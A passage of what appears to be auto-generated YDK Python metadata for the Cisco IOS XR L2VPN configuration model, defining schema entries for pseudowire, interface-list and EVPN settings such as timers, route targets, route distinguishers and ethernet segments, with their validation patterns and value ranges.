'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-routing', REFERENCE_CLASS, 'PwRouting' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.PwRouting',
[], [],
''' Pseudowire-routing attributes
''',
'pw_routing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-status-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable PW status
''',
'pw_status_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pwoam-refresh', ATTRIBUTE, 'int' , None, None,
[('1', '4095')], [],
''' Configure PW OAM refresh interval
''',
'pwoam_refresh',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('snmp', REFERENCE_CLASS, 'Snmp' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp',
[], [],
''' SNMP related configuration
''',
'snmp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('tcn-propagation', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Topology change notification propagation
''',
'tcn_propagation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('utility', REFERENCE_CLASS, 'Utility' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Utility',
[], [],
''' L2VPN utilities
''',
'utility',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2vpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists.GenericInterface.Interfaces.Interface' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists.GenericInterface.Interfaces.Interface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable interface
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists.GenericInterface.Interfaces' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists.GenericInterface.Interfaces',
False,
[
_MetaInfoClassMember('interface', REFERENCE_LIST, 'Interface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'GenericInterfaceLists.GenericInterface.Interfaces.Interface',
[], [],
''' Interface
''',
'interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists.GenericInterface' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists.GenericInterface',
False,
[
_MetaInfoClassMember('generic-interface-list-name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the interface list
''',
'generic_interface_list_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable interface list
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interfaces', REFERENCE_CLASS, 'Interfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'GenericInterfaceLists.GenericInterface.Interfaces',
[], [],
''' Interface table
''',
'interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'generic-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists',
False,
[
_MetaInfoClassMember('generic-interface', REFERENCE_LIST, 'GenericInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'GenericInterfaceLists.GenericInterface',
[], [],
''' Bridge group
''',
'generic_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'generic-interface-lists',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnTimers' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnTimers',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVPN timers
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-peering', ATTRIBUTE, 'int' , None, None,
[('0', '300')], [],
''' Global Peering timer
''',
'evpn_peering',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-recovery', ATTRIBUTE, 'int' , None, None,
[('20', '3600')], [],
''' Global Recovery timer
''',
'evpn_recovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-timers',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVI Loadbalancing
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evi-flow-label', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Flow Label based load balancing
''',
'evi_flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evi-load-balancing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs',
False,
[
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'two-byte-as-or-four-byte-as',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ipv4-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget',
False,
[
_MetaInfoClassMember('format', REFERENCE_ENUM_CLASS, 'BgpRouteTargetFormatEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetFormatEnum',
[], [],
''' Format of the route target
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'BgpRouteTargetRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetRoleEnum',
[], [],
''' Role of the router target type
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('stitching', REFERENCE_ENUM_CLASS, 'BgpRouteTargetEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetEnum',
[], [],
''' whether RT is Stitching RT
''',
'stitching',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ipv4-address', REFERENCE_LIST, 'Ipv4Address' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address',
[], [],
''' ipv4 address
''',
'ipv4_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('two-byte-as-or-four-byte-as', REFERENCE_LIST, 'TwoByteAsOrFourByteAs' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs',
[], [],
''' two byte as or four byte as
''',
'two_byte_as_or_four_byte_as',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-target',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets',
False,
[
_MetaInfoClassMember('evpn-route-target', REFERENCE_LIST, 'EvpnRouteTarget' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget',
[], [],
''' Name of the Route Target
''',
'evpn_route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-targets',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-distinguisher', REFERENCE_CLASS, 'EvpnRouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'evpn_route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-targets', REFERENCE_CLASS, 'EvpnRouteTargets' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets',
[], [],
''' Route Target
''',
'evpn_route_targets',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('table-policy', ATTRIBUTE, 'str' , None, None,
[], [],
''' Table Policy for installation of forwarding
data to L2FIB
''',
'table_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnevibgp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' EVI ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('evi-load-balancing', REFERENCE_CLASS, 'EviLoadBalancing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing',
[], [],
''' Enter EVI Loadbalancing configuration submode
''',
'evi_load_balancing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-evi-cw-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' CW disable for EVPN EVI
''',
'evpn_evi_cw_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnevi-description', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' Description for EVPN EVI
''',
'evpnevi_description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnevibgp-auto-discovery', REFERENCE_CLASS, 'EvpnevibgpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery',
[], [],
''' Enable Autodiscovery BGP in EVPN EVI
''',
'evpnevibgp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnevi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis',
False,
[
_MetaInfoClassMember('evpnevi', REFERENCE_LIST, 'Evpnevi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi',
[], [],
''' Enter EVPN EVI configuration submode
''',
'evpnevi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnevis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnLoadBalancing' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnLoadBalancing',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVPN Loadbalancing
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-flow-label', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Flow Label based load balancing
''',
'evpn_flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-load-balancing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnbgpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnbgpAutoDiscovery',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-distinguisher', REFERENCE_CLASS, 'EvpnRouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'evpn_route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnbgp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Interface-specific timers
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnac-peering', ATTRIBUTE, 'int' , None, None,
[('0', '300')], [],
''' Interface-specific Peering timer
''',
'evpnac_peering',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnac-recovery', ATTRIBUTE, 'int' , None, None,
[('20', '3600')], [],
''' Interface-specific Recovery timer
''',
'evpnac_recovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnac-timers',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0',
False,
[
_MetaInfoClassMember('bytes1', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 1st Byte
''',
'bytes1',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes23', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 2nd and 3rd Bytes
''',
'bytes23',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes45', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 4th and 5th Bytes
''',
'bytes45',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes67', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 6th and 7th Bytes
''',
'bytes67',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes89', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 8th and 9th Bytes
''',
'bytes89',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'identifier-type0',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList',
False,
[
_MetaInfoClassMember('primary', ATTRIBUTE, 'str' , None, None,
[(0, 150)], [],
''' Primary services list
''',
'primary',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('secondary', ATTRIBUTE, 'str' , None, None,
[(0, 150)], [],
''' Secondary services list
''',
'secondary',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'service-list',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Manual service carving
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('service-list', REFERENCE_CLASS, 'ServiceList' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList',
[], [],
''' Manual service carving primary,secondary
lists
''',
'service_list',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'manual-service-carving',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment',
False,
[
_MetaInfoClassMember('backbone-source-mac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Backbone Source MAC
''',
'backbone_source_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Ethernet Segment
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('es-import-route-target', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' ES-Import Route Target
''',
'es_import_route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('force-single-homed', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Force ethernet segment to remain
single-homed
''',
'force_single_homed',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('identifier-type0', REFERENCE_CLASS, 'IdentifierType0' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0',
[], [],
''' Ethernet segment identifier (Type 0)
''',
'identifier_type0',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('load-balancing-per-service', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable per service load balancing mode
''',
'load_balancing_per_service',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('manual-service-carving', REFERENCE_CLASS, 'ManualServiceCarving' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving',
[], [],
''' Enter Manual service carving configuration
submode
''',
'manual_service_carving',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ethernet-segment',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ethernet-segment', REFERENCE_CLASS, 'EthernetSegment' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment',
[], [],
